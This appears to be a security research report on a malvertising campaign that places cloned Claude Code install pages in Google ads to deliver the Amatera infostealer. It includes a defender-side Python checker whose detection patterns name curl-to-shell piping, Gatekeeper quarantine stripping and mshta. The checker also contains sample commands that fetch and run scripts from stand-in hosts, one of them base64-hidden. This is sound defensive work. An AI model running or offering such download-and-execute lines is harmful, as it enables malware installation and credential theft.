Pillar Research

InstallFix: Fake Claude Code Pages Deliver Amatera Stealer

A malvertising campaign purchases Google Ads to place pixel-perfect Claude Code documentation clones above organic search results. The fake pages replace the macOS installation command with an obfuscated payload that downloads and executes the Amatera Stealer infostealer.

March 10, 2026 Report by Eilon Cohen

Executive Summary

A malvertising campaign is actively targeting developers and non-technical “vibe coders” searching for Claude Code installation instructions. Attackers purchase Google Ads for terms like “install Claude Code” and “Claude Code CLI,” directing victims to pixel-perfect clones of the official Claude Code documentation. The fake pages replace the legitimate installation command with an obfuscated shell one-liner that downloads and executes the Amatera Stealer infostealer.

The campaign was first documented publicly by Push Security on March 6, 2026, under the name “InstallFix.” It specifically targets macOS users with a multi-stage payload chain that bypasses Gatekeeper protections. A Windows variant using the mshta.exe LOLBin technique has also been observed. At the time of this analysis, at least one Squarespace clone domain and multiple payload delivery domains remain live.

Investigation of the C2 infrastructure revealed a Caddy-based panel hosted on VDSina (SERVERS TECH FZCO, Dubai/Netherlands) with open registration, fronted by Cloudflare. The attacker rotates panel domains every few weeks while maintaining origin servers on the same hosting provider. The binary uses an anti-analysis technique where main() is a no-op and actual execution runs from a constructor function, with all strings built character-by-character at runtime from encrypted lookup tables.

The technique exploits a fundamental trust assumption in developer tooling: the “curl-to-bash” installation pattern, where the entire security model relies on the user trusting the domain in the command. With AI coding tools attracting users who may not scrutinize terminal commands, the attack surface has expanded well beyond the traditional developer audience.
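A defender-side check that makes the trust assumption above concrete, added here as an example and not code from the report or from Push Security: it screens a pasted install one-liner for remote content piped straight into a shell, for download hosts outside an allowlist (the allowlist entry install.example-vendor.test is a placeholder to be replaced with the vendor's real installer host), and for obfuscation markers, decoding any embedded base64 blob to inspect what it hides. The sample commands and the xattr/mshta patterns are constructed assumptions, not commands taken from the campaign.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts the installer may legitimately be fetched from. Placeholder: fill in
# the vendor's real documentation/installer host before use.
TRUSTED_INSTALL_HOSTS = {"install.example-vendor.test"}
# Remote content handed straight to a shell without landing on disk for review.
REMOTE_EXEC = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),   # curl ... | bash
    re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b"),     # bash -c "$(curl ...)"
]
# Obfuscation / bypass markers. The xattr and mshta entries are this example's
# assumptions about the Gatekeeper bypass and mshta.exe LOLBin the report names.
OBFUSCATION = [
    (re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\beval\b"), "eval of dynamically built text"),
    (re.compile(r"\bxattr\b.*com\.apple\.quarantine"), "quarantine attribute stripped (Gatekeeper)"),
    (re.compile(r"\bmshta(\.exe)?\b", re.I), "mshta LOLBin"),
]
URL = re.compile(r"https?://[^\s'\"|;)]+")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def assess_install_command(command, depth=0):
    """Return findings for a pasted install one-liner; [] means nothing was flagged."""
    findings = []
    if any(p.search(command) for p in REMOTE_EXEC):
        findings.append("remote script executed directly by a shell")
    hosts = {h.lower() for u in URL.findall(command) if (h := urlparse(u).hostname)}
    for host in sorted(hosts):
        if not any(host == t or host.endswith("." + t) for t in TRUSTED_INSTALL_HOSTS):
            findings.append(f"download from untrusted host: {host}")
    findings += [label for pat, label in OBFUSCATION if pat.search(command)]
    # Decode embedded base64 blobs and assess what they hide (one level deep).
    for blob in (B64_BLOB.findall(command) if depth == 0 else []):
        try:
            inner = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if inner.isprintable():
            findings += [f"decoded payload: {f}" for f in assess_install_command(inner, depth + 1)]
    return findings

# Constructed samples, not commands observed in the campaign.
HIDDEN = base64.b64encode(b"curl -fsSL https://cdn.example.test/x | sh").decode()
SAMPLES = {
    "expected": "curl -fsSL https://install.example-vendor.test/install.sh | bash",
    "cloned": '/bin/bash -c "$(curl -fsSL https://claude-code-docs.example.test/i.sh)"',
    "obfuscated": f"echo {HIDDEN} | base64 -d | bash",
}
```

Note that the vendor's own command is still reported for piping a remote script into a shell; only the host check separates it from the clone, which is exactly the trust boundary the curl-to-bash pattern leaves to the user.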

Figure 1 — Sponsored Google result directing to Squarespace clone

Figure 2 — Fake documentation page with obfuscated install command

Key figures
Clone sites: 16+
Payload domains: 6
C2 origin IPs: 3
Panel domains: 6
Campaign status: Active